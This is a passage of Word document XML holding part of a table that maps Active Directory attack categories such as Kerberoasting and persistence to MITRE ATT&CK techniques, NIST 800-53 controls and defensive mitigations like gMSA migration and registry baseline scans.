                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Restrict RPC traffic.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6659C017" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRPr="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="15AA7652" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRPr="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Restrict LDAP queries to authenticated/authoriz3ed service accounts.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BF83AE5" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRPr="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2B05E287" w14:textId="52334997" w:rsidR="000B6E74" w:rsidRPr="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Automate firewall rule updates to block cross-subnet RPC/SMB enumeration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B6E74" w14:paraId="571B2C8C" w14:textId="77777777" w:rsidTr="00DF2381">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1695" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="18A133F2" w14:textId="7840EE7D" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Kerberoasting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2619" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B528B59" w14:textId="1DB95D86" w:rsidR="000B6E74" w:rsidRPr="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">T1558.003: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Steal or Modify Kerberos-Issued Tickets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="64DD2386" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>AC-2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CAAE69A" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>AC-6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BB2D816" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="01159B8E" w14:textId="7CBA9E60" w:rsidR="000B6E74" w:rsidRPr="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>IA-5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3209" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1F84FF88" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRPr="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Execute automated PowerShell audits to locate SPNs mapped to target user-victim accounts.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03F54502" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRPr="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="28B8DDA1" w14:textId="536FADB0" w:rsidR="000B6E74" w:rsidRPr="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Force migration to Group Managed Service Accounts (gMSAs) or apply 128+-character random passwords.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B6E74" w14:paraId="4B2D521A" w14:textId="77777777" w:rsidTr="00DF2381">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1695" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4888E681" w14:textId="64B7ECED" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Domain and Network Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2619" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1DC74207" w14:textId="5624C6BB" w:rsidR="000B6E74" w:rsidRPr="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">T1547: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Boot/Logon AutoStart</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DF9ED4B" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRPr="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="46FFAF11" w14:textId="07203691" w:rsidR="000B6E74" w:rsidRPr="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000B6E74">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">1078: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Valid Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="021A7D5F" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>AC-2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15196C7E" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6B861F64" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CM-2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14E03A6F" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CM-6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="132AEA36" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="72294F57" w14:textId="1E5BD9E8" w:rsidR="000B6E74" w:rsidRPr="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SI-4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3209" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5BF69299" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000B6E74">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Automate daily scans of </w:t>
            </w:r>
            <w:r w:rsidRPr="000B6E74">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Run/RunOnce</w:t>
            </w:r>
            <w:r w:rsidRPr="000B6E74">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> keys, WMI event consumers, and Scheduled Tasks against a known-good baseline (Policy-as-Code).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05D93A82" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRPr="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="59EBEE99" w14:textId="6210159E" w:rsidR="000B6E74" w:rsidRPr="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000B6E74">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Automatically </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="000B6E74">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>terminate</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="000B6E74">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> unauthorized persistence points.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B6E74" w14:paraId="5CE219B6" w14:textId="77777777" w:rsidTr="00DF2381">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1695" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="24B38637" w14:textId="44A3E63B" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Domain Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2619" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1C1BD5D6" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRPr="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">T1068: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Exploitation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A0116CF" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRPr="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1630AC7F" w14:textId="3BDD0581" w:rsidR="000B6E74" w:rsidRPr="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">T1548: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
